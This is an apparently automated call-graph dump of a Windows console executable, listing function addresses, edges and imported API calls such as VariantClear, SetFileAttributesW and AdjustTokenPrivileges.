33446 f7be6c VariantClear 33444->33446 33447 f7be6c VariantClear 33445->33447 33448 f8b817 33446->33448 33447->33472 33514 f8a24c 33448->33514 33453 fab2cc VariantClear 33454 f8b862 33453->33454 33457 f8b89d 33454->33457 33454->33472 33697 f8a024 29 API calls 33454->33697 33456 f8b8fb 33458 f8bbed 33456->33458 33459 f8bab6 33456->33459 33462 f8b8bd 33457->33462 33471 f8b908 33457->33471 33457->33472 33466 f8bc58 33458->33466 33467 f8bc14 33458->33467 33458->33472 33465 f72350 2 API calls 33459->33465 33477 f8bac9 33459->33477 33460 f8b938 33460->33472 33700 f88db8 free free memmove 33460->33700 33462->33456 33698 f88db8 free free memmove 33462->33698 33465->33477 33569 f8ac94 33466->33569 33470 f72350 2 API calls 33467->33470 33469 f8bba0 free 33469->33472 33470->33472 33471->33460 33471->33472 33699 f74ee4 CharUpperW CharUpperW 33471->33699 33475 f8bb74 33479 f739ac 6 API calls 33475->33479 33701 f9efc0 33477->33701 33479->33469 33484 f864ac 33480->33484 33481 fad50a 33482 faa074 VariantClear 33481->33482 33485 fad52f 33482->33485 33483 fad4f3 free free 33483->33484 33484->33481 33484->33483 33486 f8b795 33485->33486 33708 fac8e4 15 API calls 33485->33708 33486->33441 33486->33442 33486->33472 33488 fad54f 33488->33486 33489 f73798 4 API calls 33488->33489 33490 fad563 33489->33490 33491 faa074 VariantClear 33490->33491 33501 fad580 33490->33501 33491->33501 33492 fad7fb 33712 f75a4c 11 API calls 33492->33712 33493 fad731 33711 fad19c 21 API calls 33493->33711 33494 fad6c1 33497 f73730 4 API calls 33494->33497 33498 fad6ff 33494->33498 33497->33498 33498->33492 33498->33493 33499 fad637 33503 fad65a 33499->33503 33510 fad614 33499->33510 33710 fac8e4 15 API calls 33499->33710 33500 f7be6c VariantClear 33500->33486 33501->33486 33501->33494 33501->33499 33501->33510 33709 f73850 malloc _CxxThrowException SysStringLen free 33501->33709 33507 f7be6c VariantClear 33503->33507 33504 fad743 33504->33486 33505 f73730 4 API calls 33504->33505 33512 fad794 33504->33512 33505->33512 33507->33494 33508 fad7e5 free free 33508->33486 33509 fad67f 33509->33510 33511 faa074 VariantClear 33509->33511 33510->33500 33513 fad6a0 33511->33513 33512->33486 33512->33508 33513->33503 33513->33510 33515 f8a2c9 33514->33515 33516 f8a2d0 33515->33516 33517 f8a2dd 33515->33517 33518 f8a2fe 33515->33518 33519 f7be6c VariantClear 33516->33519 33713 f73850 malloc _CxxThrowException SysStringLen free 33517->33713 33518->33516 33521 f8a2fc 33518->33521 33522 f8a313 33519->33522 33523 f7be6c VariantClear 33521->33523 33522->33472 33565 faa074 33522->33565 33524 f8a324 33523->33524 33525 f8a352 33524->33525 33526 f8a35f 33524->33526 33527 f8a380 33524->33527 33528 f7be6c VariantClear 33525->33528 33714 f73850 malloc _CxxThrowException SysStringLen free 33526->33714 33527->33525 33530 f8a37e 33527->33530 33528->33522 33531 f7be6c VariantClear 33530->33531 33532 f8a3a6 33531->33532 33532->33522 33533 f8a544 33532->33533 33534 f7354c 2 API calls 33532->33534 33533->33522 33538 f8a599 33533->33538 33717 f73cb8 memmove 33533->33717 33536 f8a456 33534->33536 33537 f7354c 2 API calls 33536->33537 33539 f8a461 33537->33539 33544 f8a5d0 33538->33544 33718 f73cb8 memmove 33538->33718 33540 f72db8 2 API calls 33539->33540 33542 f8a46f 33540->33542 33715 f7a0bc 6 API calls 33542->33715 33544->33522 33719 f75a4c 11 API calls 33544->33719 33545 f8a48a 33547 f8a523 free free free 33545->33547 33716 f7a2b4 13 API calls 33545->33716 33547->33533 33549 f8a65b 33721 f88db8 free free memmove 33549->33721 33551 f8a4a9 33553 f73798 4 API calls 33551->33553 33552 f8a66b 33555 f9efc0 7 API calls 33552->33555 33556 f8a4b9 free 33553->33556 33558 f8a67a 33555->33558 33563 f8a4df 33556->33563 33557 f8a61a 33557->33549 33557->33552 33720 f74ee4 CharUpperW CharUpperW 33557->33720 33559 f73798 4 API calls 33558->33559 33560 f8a68a free 33559->33560 33561 f8a6d1 free 33560->33561 33562 f8a6a3 33560->33562 33561->33522 33562->33561 33564 f8a6bc free free 33562->33564 33563->33547 33564->33562 33567 faa0a4 33565->33567 33566 f7be6c VariantClear 33568 f8b840 33566->33568 33567->33566 33568->33453 33568->33472 33722 f870a4 33569->33722 33572 f8b576 33572->33472 33573 faa074 VariantClear 33574 f8acf8 33573->33574 33574->33572 33740 f8a7e4 33574->33740 33577 f9efc0 7 API calls 33578 f8ad19 33577->33578 33579 f8ad2b 33578->33579 33856 f8a9fc 131 API calls 33578->33856 33581 f736a8 3 API calls 33579->33581 33582 f8ad3a 33581->33582 33585 f8ad7e 33582->33585 33857 f86330 7 API calls 33582->33857 33584 f8ad65 33586 f73798 4 API calls 33584->33586 33588 f8ae93 33585->33588 33593 f7354c 2 API calls 33585->33593 33587 f8ad73 free 33586->33587 33587->33585 33589 f8ae9b 33588->33589 33590 f8aef3 33588->33590 33592 f73798 4 API calls 33589->33592 33591 f8af35 33590->33591 33768 f8728c 33590->33768 33596 f73798 4 API calls 33591->33596 33595 f8aeac 33592->33595 33608 f8adae free 33593->33608 33598 f8aec5 33595->33598 33860 f77088 48 API calls 33595->33860 33599 f8af4a 33596->33599 33598->33591 33604 f8aed5 33598->33604 33605 f8af53 free 33599->33605 33606 f8af66 33599->33606 33600 f8af0e free 33609 f8b56a free 33600->33609 33601 f8af20 33601->33591 33610 f8af25 free 33601->33610 33612 f8aee3 free 33604->33612 33613 f87b1c 14 API calls 33604->33613 33605->33609 33607 f8af6e 33606->33607 33623 f8afd9 33606->33623 33861 f882c8 218 API calls 33607->33861 33608->33588 33611 f8ae0c 33608->33611 33609->33572 33610->33609 33616 f73798 4 API calls 33611->33616 33612->33609 33617 f8aee2 33613->33617 33615 f8b0aa 33620 f72350 2 API calls 33615->33620 33619 f8ae27 33616->33619 33617->33612 33618 f8af91 33621 f8afa9 33618->33621 33622 f8af97 free 33618->33622 33624 f8ae3d 33619->33624 33858 f732b0 _CxxThrowException 33619->33858 33632 f8b12a 33620->33632 33626 f8afc6 free 33621->33626 33630 f87b1c 14 API calls 33621->33630 33622->33609 33623->33615 33862 f860f4 VariantClear _CxxThrowException _CxxThrowException 33623->33862 33625 f736a8 3 API calls 33624->33625 33629 f8ae6e 33625->33629 33626->33609 33859 f9edf0 malloc _CxxThrowException free 33629->33859 33630->33626 33631 f8b015 33634 f8b01b free 33631->33634 33647 f8b02d 33631->33647 33850 f7a008 33632->33850 33634->33609 33635 f8ae79 33637 f739ac 6 API calls 33635->33637 33639 f8ae88 free 33637->33639 33639->33588 33640 f8b196 33866 f86e88 14 API calls 33640->33866 33642 f8b40e 33646 f8b4cd 33642->33646 33658 f736a8 3 API calls 33642->33658 33643 f8b1aa 33649 f8b1b0 free 33643->33649 33650 f8b1d1 free 33643->33650 33644 f8b0ac 33863 f77258 50 API calls 33644->33863 33645 f8b09d 33651 f73798 4 API calls 33645->33651 33665 f8b4ee free 33646->33665 33669 f8b2a4 free 33646->33669 33647->33615 33647->33644 33647->33645 33648 f8b1f0 33659 f8b234 33648->33659 33660 f8b33b 33648->33660 33649->33609 33650->33609 33651->33615 33654 f8b0b9 33656 f8b0bd 33654->33656 33657 f8b105 33654->33657 33864 f795e0 GetLastError 33656->33864 33663 f87b1c 14 API calls 33657->33663 33662 f8b43a 33658->33662 33674 f8b278 33659->33674 33675 f8b26c free 33659->33675 33690 f8b28c 33659->33690 33660->33642 33664 f799cc 6 API calls 33660->33664 33686 f8b49c 33662->33686 33869 f87e80 7 API calls 33662->33869 33667 f8b10d free 33663->33667 33668 f8b37d 33664->33668 33665->33609 33666 f8b0c2 33865 f86f80 13 API calls 33666->33865 33667->33609 33673 f8b3bf 33668->33673 33867 f86e88 14 API calls 33668->33867 33669->33609 33671 f72350 2 API calls 33671->33669 33853 f79784 33673->33853 33680 f72350 2 API calls 33674->33680 33674->33690 33675->33674 33678 f8b0dd 33681 f8b0e3 free 33678->33681 33682 f8b0f5 free 33678->33682 33680->33690 33681->33609 33682->33609 33685 f8b4c3 free 33685->33646 33686->33685 33688 f73798 4 API calls 33686->33688 33687 f8b398 33687->33673 33689 f8b39e free 33687->33689 33691 f8b4c2 33688->33691 33689->33609 33690->33671 33691->33685 33694 f8b3e7 33694->33642 33695 f8b3ed free 33694->33695 33695->33609 33697->33457 33698->33456 33699->33471 33700->33456 33702 f7354c 2 API calls 33701->33702 33704 f9efe9 33702->33704 33703 f8bb42 33703->33469 33703->33475 33707 f732b0 _CxxThrowException 33703->33707 33704->33703 33705 f739ac 6 API calls 33704->33705 33901 f732b0 _CxxThrowException 33704->33901 33705->33704 33708->33488 33710->33509 33711->33504 33712->33486 33715->33545 33716->33551 33717->33538 33718->33538 33719->33557 33720->33557 33721->33552 33723 f870fb 33722->33723 33724 f87101 33723->33724 33726 f8710e 33723->33726 33725 f7be6c VariantClear 33724->33725 33727 f8716a 33725->33727 33728 f7be6c VariantClear 33726->33728 33727->33572 33727->33573 33731 f8717b 33728->33731 33729 f871af 33732 f7be6c VariantClear 33729->33732 33730 f871bc 33733 f7be6c VariantClear 33730->33733 33731->33729 33731->33730 33732->33727 33734 f871f1 33733->33734 33870 f86d18 VariantClear 33734->33870 33736 f87208 33736->33727 33871 f86d18 VariantClear 33736->33871 33738 f87223 33738->33727 33872 f86d18 VariantClear 33738->33872 33741 f8a802 33740->33741 33743 f8a834 33741->33743 33873 f9f078 17 API calls 33741->33873 33744 f8a98c 33743->33744 33745 f736a8 3 API calls 33743->33745 33744->33577 33746 f8a852 33745->33746 33874 f9edf0 malloc _CxxThrowException free 33746->33874 33748 f8a85d 33749 f8a86a 33748->33749 33750 f8a8c3 33748->33750 33751 fb5a44 5 API calls 33749->33751 33752 f8a890 33750->33752 33875 f7553c wcscmp 33750->33875 33755 f8a876 33751->33755 33753 f8a957 33752->33753 33876 f732b0 _CxxThrowException 33752->33876 33756 f739ac 6 API calls 33753->33756 33757 f72350 2 API calls 33755->33757 33760 f8a981 free 33756->33760 33761 f8a87e 33757->33761 33759 f8a8d5 33759->33752 33762 fb5a44 5 API calls 33759->33762 33760->33744 33761->33752 33764 f7354c 2 API calls 33761->33764 33763 f8a8e5 33762->33763 33765 f72350 2 API calls 33763->33765 33764->33752 33766 f8a8ef 33765->33766 33766->33752 33767 f7354c 2 API calls 33766->33767 33767->33752 33769 f872bd 33768->33769 33770 f7354c 2 API calls 33769->33770 33771 f872ca 33770->33771 33772 f788ec 102 API calls 33771->33772 33773 f872db 33772->33773 33779 f875f9 33773->33779 33781 f872e5 33773->33781 33774 f875e5 free 33778 f876b5 33774->33778 33775 f8744b 33776 f87490 33775->33776 33777 f87451 33775->33777 33783 f8749a 33776->33783 33784 f87562 33776->33784 33889 f7e70c 106 API calls 33777->33889 33778->33600 33778->33601 33780 f876a3 free 33779->33780 33788 f736a8 3 API calls 33779->33788 33780->33778 33781->33775 33805 f872eb 33781->33805 33888 f85f40 malloc _CxxThrowException memmove 33781->33888 33789 f736a8 3 API calls 33783->33789 33785 f8759c 33784->33785 33786 f87570 33784->33786 33898 f79164 103 API calls 33785->33898 33896 f77088 48 API calls 33786->33896 33787 f87459 33792 f8745d 33787->33792 33793 f87484 33787->33793 33807 f87629 33788->33807 33795 f874a7 33789->33795 33890 f86e00 7 API calls 33792->33890 33793->33780 33891 f7e70c 106 API calls 33795->33891 33796 f87312 33798 f734d0 4 API calls 33796->33798 33803 f87328 free 33798->33803 33799 f87578 33799->33780 33804 f87580 33799->33804 33801 f875a4 33801->33780 33806 f875ac 33801->33806 33802 f874b2 33808 f874f5 33802->33808 33809 f874b6 33802->33809 33815 f873a7 33803->33815 33897 f86e88 14 API calls 33804->33897 33805->33774 33899 f77474 56 API calls 33806->33899 33813 f7354c 2 API calls 33807->33813 33893 f77130 50 API calls 33808->33893 33892 f86e00 7 API calls 33809->33892 33812 f875b4 33812->33780 33817 f875bc GetLastError 33812->33817 33818 f87657 33813->33818 33820 f873ae free 33815->33820 33826 f873c1 33815->33826 33817->33780 33822 f875cb 33817->33822 33823 f788ec 102 API calls 33818->33823 33819 f874c8 33824 f874ce free 33819->33824 33825 f874e0 free 33819->33825 33820->33774 33821 f87502 33828 f87553 free 33821->33828 33829 f87506 33821->33829 33900 f86e88 14 API calls 33822->33900 33831 f8766d 33823->33831 33824->33774 33825->33774 33827 f87441 free 33826->33827 33832 f8740a 33826->33832 33836 f8742a free 33826->33836 33837 f873d4 33826->33837 33827->33775 33828->33780 33894 f795e0 GetLastError 33829->33894 33835 f8768b free free 33831->33835 33877 f76fcc 33831->33877 33832->33827 33834 f875dd 33834->33774 33835->33780 33836->33774 33839 f873d8 33837->33839 33840 f87413 free 33837->33840 33838 f8750b 33895 f86f80 13 API calls 33838->33895 33839->33832 33843 f873dc 33839->33843 33840->33774 33846 f873e0 free 33843->33846 33847 f873f5 free 33843->33847 33844 f87526 33848 f8752c free 33844->33848 33849 f8753e free 33844->33849 33846->33774 33847->33774 33848->33774 33849->33774 33851 f79a94 48 API calls 33850->33851 33852 f7a02a 33851->33852 33852->33640 33852->33648 33854 f796f8 5 API calls 33853->33854 33855 f797a0 33854->33855 33855->33642 33868 f86e88 14 API calls 33855->33868 33856->33579 33857->33584 33859->33635 33860->33598 33861->33618 33862->33631 33863->33654 33864->33666 33865->33678 33866->33643 33867->33687 33868->33694 33869->33686 33870->33736 33871->33738 33872->33727 33873->33743 33874->33748 33875->33759 33878 f76fe7 33877->33878 33879 f77001 33878->33879 33880 f76fee SetFileAttributesW 33878->33880 33881 f76ffd 33879->33881 33882 f7354c 2 API calls 33879->33882 33880->33879 33880->33881 33881->33835 33883 f7700f 33882->33883 33884 f7b8b0 44 API calls 33883->33884 33885 f77024 33884->33885 33886 f77048 free 33885->33886 33887 f77028 SetFileAttributesW free 33885->33887 33886->33881 33887->33881 33888->33796 33889->33787 33890->33805 33891->33802 33892->33819 33893->33821 33894->33838 33895->33844 33896->33799 33897->33805 33898->33801 33899->33812 33900->33834 33902 fad9ee 33904 fad9f4 33902->33904 33903 f75110 3 API calls 33905 fada99 33903->33905 33904->33903 33906 f7354c 2 API calls 33905->33906 33907 fadaa4 33906->33907 33908 fadad4 33907->33908 33909 f73730 4 API calls 33907->33909 33910 f72350 2 API calls 33908->33910 33911 fadb1a 33908->33911 33909->33908 33910->33911 33941 f98ad8 33911->33941 33913 fae4ac 33914 f72350 2 API calls 33913->33914 33924 fae4da 33913->33924 33914->33924 33915 fae9e4 free free free free 33919 fb182e free 33915->33919 33916 fadb98 33916->33913 33918 fae48a free free free 33916->33918 33918->33919 33920 fb23f7 33919->33920 33922 fae9f0 free free free free 33922->33919 33923 faea1b free free free free 33923->33919 33924->33915 33924->33922 33924->33923 33925 faea46 free free free free 33924->33925 33928 faea85 free free free free 33924->33928 33930 faeaca free free free free 33924->33930 33932 faeb4e free free free free 33924->33932 33934 faeb90 free free free free 33924->33934 33935 f73798 malloc _CxxThrowException free memmove 33924->33935 33937 faebcf free free free free 33924->33937 33939 faeb09 free free free free 33924->33939 33950 fac940 33924->33950 33954 faa408 6 API calls 33924->33954 33925->33919 33928->33919 33930->33919 33932->33919 33934->33919 33935->33924 33937->33919 33939->33919 33942 f98aeb 33941->33942 33943 f98b54 33941->33943 33944 f98b0e 33942->33944 33945 f98af4 _CxxThrowException 33942->33945 33943->33916 33946 f72350 2 API calls 33944->33946 33945->33944 33947 f98b2a 33946->33947 33948 f98b33 memmove 33947->33948 33949 f98b46 free 33947->33949 33948->33949 33949->33943 33951 fac968 33950->33951 33953 fac978 33951->33953 33955 fb4c98 19 API calls 33951->33955 33953->33924 33954->33924 33955->33953 33956 f7eae0 33957 f7eafd 33956->33957 33961 f7eaf3 33956->33961 33958 f796f8 5 API calls 33957->33958 33957->33961 33959 f7eb5b 33958->33959 33960 f7eb63 GetLastError 33959->33960 33959->33961 33960->33961 33962 f7f3a0 33963 f7f3b2 33962->33963 33964 f7f3c1 33962->33964 33967 f7e8c4 33963->33967 33970 fcd8a0 VirtualFree 33967->33970 33969 f7e919 33970->33969 33971 f83760 34025 f71648 33971->34025 33974 f837ca _isatty _isatty _isatty 33977 f8381d 33974->33977 33976 f837b8 _CxxThrowException 33976->33974 33986 f83892 33977->33986 34047 f82c88 9 API calls 33977->34047 33979 f8387a 33980 f72ecc 3 API calls 33979->33980 33981 f83887 free 33980->33981 33981->33986 33982 f83934 34040 f7bd0c GetCurrentProcess OpenProcessToken 33982->34040 33985 f7bd0c 6 API calls 33987 f839c7 33985->33987 33986->33982 34048 f986a8 7 API calls 33986->34048 33989 f83a72 33987->33989 33991 f839f9 wcscmp 33987->33991 33992 f839f2 33987->33992 33993 f83b97 33989->33993 33995 f72db8 2 API calls 33989->33995 33990 f83969 _CxxThrowException 33990->33982 33991->33992 33994 f83a0e 33991->33994 34050 f7bda4 GetModuleHandleW GetProcAddress 33992->34050 33994->33992 33999 f83a23 33994->33999 33997 f83aa0 33995->33997 34052 f72f28 malloc _CxxThrowException free 33997->34052 33998 f83a55 33998->33989 34051 fcd8c0 GetModuleHandleW GetProcAddress 33998->34051 34049 f986a8 7 API calls 33999->34049 34003 f83aae 34053 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 34003->34053 34004 f83a5e 34007 f7bd0c 6 API calls 34004->34007 34005 f83a37 _CxxThrowException 34005->33992 34008 f83a6c 34007->34008 34008->33989 34009 f83abd 34010 f83b19 34009->34010 34054 f986a8 7 API calls 34009->34054 34055 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 34010->34055 34012 f83b07 _CxxThrowException 34012->34010 34014 f83b33 GetCurrentProcess SetProcessAffinityMask 34015 f83b4a GetLastError 34014->34015 34016 f83b84 34014->34016 34056 f739f0 malloc _CxxThrowException memmove free _CxxThrowException 34015->34056 34058 f73920 _CxxThrowException 34016->34058 34019 f83b8c free 34019->33993 34020 f83b61 34057 f76d34 10 API calls 34020->34057 34022 f83b6d 34023 f739ac 6 API calls 34022->34023 34024 f83b79 free 34023->34024 34024->34016 34026 f7169f 34025->34026 34027 f716cb 34025->34027 34026->34027 34030 f716b7 free free 34026->34030 34028 f71701 34027->34028 34031 f716f9 free 34027->34031 34029 f72350 2 API calls 34028->34029 34034 f71719 34029->34034 34030->34026 34031->34028 34032 f71805 34032->33974 34046 f986a8 7 API calls 34032->34046 34033 fb5a44 5 API calls 34033->34034 34034->34032 34034->34033 34035 f72350 2 API calls 34034->34035 34037 f736a8 3 API calls 34034->34037 34038 f71807 34034->34038 34059 f7138c 9 API calls 34034->34059 34035->34034 34037->34034 34039 f73798 4 API calls 34038->34039 34039->34032 34041 f7bd37 LookupPrivilegeValueW 34040->34041 34042 f7bd98 34040->34042 34043 f7bd8d CloseHandle 34041->34043 34044 f7bd4b AdjustTokenPrivileges 34041->34044 34042->33985 34043->34042 34044->34043 34045 f7bd82 GetLastError 34044->34045 34045->34043 34046->33976 34047->33979 34048->33990 34049->34005 34050->33998 34051->34004 34052->34003 34053->34009 34054->34012 34055->34014 34056->34020 34057->34022 34058->34019 34059->34034 34060 fce286 34061 fce29d __set_app_type 34060->34061 34062 fce2e1 34061->34062 34063 fce2ea __setusermatherr 34062->34063 34064 fce2f7 _initterm __getmainargs _initterm 34062->34064 34063->34064 34065 fce371 34064->34065 34066 fce37b _cexit 34065->34066 34067 fce383 34065->34067 34066->34067 34068 fc8806 34069 fc8823 34068->34069 34070 fc880b fputs 34068->34070 34072 fc8844 34069->34072 34480 f72790 34069->34480 34243 f724c4 fputc 34070->34243 34244 f85134 34072->34244 34076 fc88b9 GetStdHandle GetConsoleScreenBufferInfo 34077 fc88da 34076->34077 34078 f72350 2 API calls 34077->34078 34079 fc88ed 34078->34079 34368 fc7b78 34079->34368 34083 fc89ec 34084 fc8a0e 34083->34084 34085 fc89f2 _CxxThrowException 34083->34085 34414 fa2250 34084->34414 34085->34084 34088 f7354c 2 API calls 34089 fc8a32 34088->34089 34439 fa827c 34089->34439 34092 fc8a82 free 34099 fc8a9c 34092->34099 34094 fc8a6d 34095 f72790 14 API calls 34094->34095 34097 fc8a78 34095->34097 34096 fc8b40 34448 fb2c2c 34096->34448 34488 f724c4 fputc 34097->34488 34099->34096 34102 fc8b1c _CxxThrowException 34099->34102 34489 f73600 34099->34489 34102->34096 34104 fc8a80 34104->34092 34105 fc8b72 _CxxThrowException 34112 fc8b96 34105->34112 34107 fc8c34 34118 fc8cb1 34107->34118 34495 f7e07c 25 API calls 34107->34495 34108 f739ac 6 API calls 34110 fc8af2 34108->34110 34113 f736a8 3 API calls 34110->34113 34112->34107 34115 fc8c38 _CxxThrowException 34112->34115 34493 fa8ba4 12 API calls 34112->34493 34494 fc78dc 6 API calls 34112->34494 34116 fc8b07 _CxxThrowException 34113->34116 34114 fc8c91 34117 fc8c95 _CxxThrowException 34114->34117 34114->34118 34115->34107 34116->34102 34117->34118 34462 f724c4 fputc 34118->34462 34120 fc8c15 free 34120->34107 34120->34112 34122 fc8ce9 fputs 34463 f724c4 fputc 34122->34463 34124 fc8d01 34166 fc8de8 34124->34166 34496 fc62b4 fputc fputs fputs fputc 34124->34496 34497 f724c4 fputc 34124->34497 34127 fc8df2 fputs 34465 f724c4 fputc 34127->34465 34131 fc8e0a strlen strlen 34133 fc91e2 34131->34133 34136 fc8e48 34131->34136 34466 f724c4 fputc 34133->34466 34498 fc62b4 fputc fputs fputs fputc 34136->34498 34138 fc91f2 fputs 34467 f724c4 fputc 34138->34467 34150 fc9226 fputs fputc 34154 fc924d fputc 34150->34154 34155 fc920a 34150->34155 34159 fc9263 fputc fputc fputc fputc 34154->34159 34155->34150 34217 fc9319 34155->34217 34499 f7260c fputs 34155->34499 34161 fc92ce 34159->34161 34500 fc6260 fputc fputs 34161->34500 34164 fc94bc 34468 f724c4 fputc 34164->34468 34464 f724c4 fputc 34166->34464 34169 fc94c4 fputs 34469 f724c4 fputc 34169->34469 34179 fc94f2 fputs fputc 34183 fc94dc 34179->34183 34183->34179 34215 fc959f 34183->34215 34508 fc6260 fputc fputs 34183->34508 34187 fc9691 34193 fca860 34187->34193 34197 fca85b 34187->34197 34190 fc937a fputc 34190->34217 34198 fca865 _CxxThrowException 34193->34198 34199 fca882 free 34193->34199 34512 fc6550 33 API calls 34197->34512 34198->34199 34203 fca8bd free 34199->34203 34204 fca89f 34199->34204 34212 fca8d3 34203->34212 34211 fca8a3 free 34204->34211 34205 fc939c fputc 34205->34217 34211->34203 34211->34211 34470 fc738c 34212->34470 34214 fc93bc fputc 34214->34217 34215->34187 34509 fc62b4 fputc fputs fputs fputc 34215->34509 34510 fa7b24 VariantClear 34215->34510 34511 fc6260 fputc fputs 34215->34511 34217->34164 34217->34190 34217->34205 34217->34214 34219 fc93e4 fputc fputc 34217->34219 34501 fc62b4 fputc fputs fputs fputc 34217->34501 34502 fa77dc VariantClear 34217->34502 34503 f7260c fputs 34217->34503 34504 fa7864 VariantClear 34219->34504 34231 fc942c 34505 fc6260 fputc fputs 34231->34505 34506 fa78ec malloc _CxxThrowException free VariantClear 34231->34506 34235 fc9478 fputc fputs 34507 f724c4 fputc 34235->34507 34239 fc949b free 34239->34164 34239->34217 34243->34069 34245 f8515e 34244->34245 34246 f85184 34244->34246 34558 f986a8 7 API calls 34245->34558 34248 f736a8 3 API calls 34246->34248 34250 f85195 34248->34250 34249 f85172 _CxxThrowException 34249->34246 34251 f851bc free 34250->34251 34254 f85206 free 34250->34254 34559 f986a8 7 API calls 34251->34559 34253 f851dc _CxxThrowException 34253->34250 34256 f8523c 34254->34256 34257 f8524f 34254->34257 34258 f7576c 8 API calls 34256->34258 34259 f85271 34257->34259 34260 f73798 4 API calls 34257->34260 34258->34257 34261 f852bc wcscmp 34259->34261 34269 f852d1 34259->34269 34260->34259 34262 f852dc 34261->34262 34261->34269 34560 f986a8 7 API calls 34262->34560 34263 f8539f 34561 f83c20 11 API calls 34263->34561 34266 f852f0 _CxxThrowException 34266->34269 34267 f853c3 34562 f83c20 11 API calls 34267->34562 34269->34263 34274 f8552a 34269->34274 34270 f853db 34271 f85413 34270->34271 34563 f84624 159 API calls 34270->34563 34279 f85446 34271->34279 34564 f84624 159 API calls 34271->34564 34565 f986a8 7 API calls 34274->34565 34276 f8553e _CxxThrowException 34276->34279 34277 f855fa 34514 f8443c 34277->34514 34279->34277 34280 f855b4 34279->34280 34566 f986a8 7 API calls 34279->34566 34283 f73798 4 API calls 34280->34283 34286 f855c5 34283->34286 34284 f85679 34288 f856a6 34284->34288 34289 f73798 4 API calls 34284->34289 34285 f855a2 _CxxThrowException 34285->34280 34286->34277 34567 f986a8 7 API calls 34286->34567 34287 f73798 4 API calls 34287->34284 34531 f7576c 34288->34531 34289->34288 34292 f855e8 _CxxThrowException 34292->34277 34296 f85e1d 34297 f85e95 34296->34297 34309 f85e22 34296->34309 34298 f85e9a 34297->34298 34299 f85f16 34297->34299 34304 f76af4 51 API calls 34298->34304 34302 f85f1f _CxxThrowException 34299->34302 34360 f85b03 34299->34360 34300 f85bda 34578 f84e4c 75 API calls 34300->34578 34301 f85b93 34301->34296 34301->34300 34577 f986a8 7 API calls 34301->34577 34308 f85ea9 34304->34308 34306 f85bc8 _CxxThrowException 34306->34300 34307 f85beb 34579 f83d28 34307->34579 34594 f7646c 14 API calls 34308->34594 34309->34360 34593 f986a8 7 API calls 34309->34593 34311 f857b0 34314 f8589e wcscmp 34311->34314 34324 f858b3 34311->34324 34318 f8590e wcscmp 34314->34318 34314->34324 34315 f85eb2 34319 f7576c 8 API calls 34315->34319 34316 f76af4 51 API calls 34316->34324 34317 f85e77 _CxxThrowException 34317->34360 34320 f8592c wcscmp 34318->34320 34318->34324 34319->34360 34322 f85950 34320->34322 34320->34324 34570 f986a8 7 API calls 34322->34570 34324->34316 34327 f85976 34324->34327 34568 f7646c 14 API calls 34324->34568 34569 f986a8 7 API calls 34324->34569 34326 f85cde 34329 f85dbe 34326->34329 34334 f85d4c 34326->34334 34589 f986a8 7 API calls 34326->34589 34335 f859d5 34327->34335 34571 f84624 159 API calls 34327->34571 34333 f85de0 34329->34333 34337 f73798 4 API calls 34329->34337 34330 f85964 _CxxThrowException 34330->34327 34331 f73798 4 API calls 34336 f85cb3 34331->34336 34332 f858fc _CxxThrowException 34332->34318 34333->34360 34592 f986a8 7 API calls 34333->34592 34334->34329 34343 f85d7d 34334->34343 34590 f986a8 7 API calls 34334->34590 34340 f85a07 34335->34340 34572 f84624 159 API calls 34335->34572 34336->34326 34588 f73c30 memmove 34336->34588 34337->34333 34341 f85a2e 34340->34341 34573 f82ee0 7 API calls 34340->34573 34548 f76af4 34341->34548 34342 f85d3a _CxxThrowException 34342->34334 34343->34329 34591 f986a8 7 API calls 34343->34591 34352 f85e0b _CxxThrowException 34352->34296 34353 f85d6b _CxxThrowException 34353->34343 34354 f85dac _CxxThrowException 34354->34329 34358 f85a54 34359 f73798 4 API calls 34358->34359 34362 f85a73 34358->34362 34359->34362 34360->34076 34360->34077 34361 f85ac9 34361->34360 34364 f73798 4 API calls 34361->34364 34362->34360 34362->34361 34575 f986a8 7 API calls 34362->34575 34366 f85aeb 34364->34366 34365 f85ab7 _CxxThrowException 34365->34361 34576 f7ab6c _CxxThrowException 34366->34576 34369 f7354c 2 API calls 34368->34369 34370 fc7bbc 34369->34370 34371 fa9944 34370->34371 34372 fa99a9 34371->34372 34373 fa997c 34371->34373 34375 fa99d1 free free free 34372->34375 34409 fa99ef 34372->34409 34373->34372 34780 fa1784 34373->34780 34374 fa9c87 34644 fa70ac 34374->34644 34375->34372 34380 f73504 4 API calls 34382 fa9ca8 34380->34382 34381 f738a8 malloc _CxxThrowException free 34381->34409 34695 fa93b8 34382->34695 34384 f7354c malloc _CxxThrowException 34384->34409 34386 fa9cd5 34388 fa9cef 34386->34388 34389 f73730 4 API calls 34386->34389 34387 fa9de7 free 34387->34083 34390 f73504 4 API calls 34388->34390 34389->34388 34391 fa9d05 34390->34391 34751 fa96f8 34391->34751 34395 fa9b0d free free 34395->34409 34396 fa9d27 34397 f73504 4 API calls 34396->34397 34399 fa9d3d 34397->34399 34401 fa96f8 196 API calls 34399->34401 34400 fb5a44 malloc _CxxThrowException _CxxThrowException memmove free 34400->34409 34402 fa9d49 free 34401->34402 34404 fa9d5f 34402->34404 34405 fa9cd0 34402->34405 34404->34405 34412 fa9d91 34404->34412 34405->34387 34406 fa1784 7 API calls 34406->34409 34407 fa9bdb free 34407->34409 34408 fa9d94 GetProcAddress 34408->34412 34409->34374 34409->34381 34409->34384 34409->34400 34409->34406 34409->34407 34410 fa9c08 memmove 34409->34410 34411 f72350 malloc _CxxThrowException 34409->34411 34787 fa8580 34409->34787 34804 fa8798 9 API calls 34409->34804 34805 fa18a8 malloc _CxxThrowException memmove memmove 34409->34805 34410->34409 34411->34409 34412->34408 34413 fa9dca 34412->34413 34413->34387 34413->34405 34415 f7354c 2 API calls 34414->34415 34416 fa2288 34415->34416 34417 f738a8 3 API calls 34416->34417 34418 fa22ce 34417->34418 34419 f7354c 2 API calls 34418->34419 34420 fa2300 34419->34420 34421 f73600 2 API calls 34420->34421 34422 fa2317 34421->34422 34423 fa8580 21 API calls 34422->34423 34424 fa2328 free free 34423->34424 34425 fb5a44 5 API calls 34424->34425 34426 fa2361 34425->34426 34427 f72350 2 API calls 34426->34427 34428 fa2369 34427->34428 34429 fa23a9 34428->34429 34430 fa239e free 34428->34430 34431 fb5a44 5 API calls 34429->34431 34430->34429 34432 fa23b6 34431->34432 34433 f72350 2 API calls 34432->34433 34434 fa23c0 34433->34434 34437 fa23da 34434->34437 34938 fa18a8 malloc _CxxThrowException memmove memmove 34434->34938 34435 fa1784 7 API calls 34438 fa23f8 34435->34438 34437->34435 34438->34088 34440 fa8348 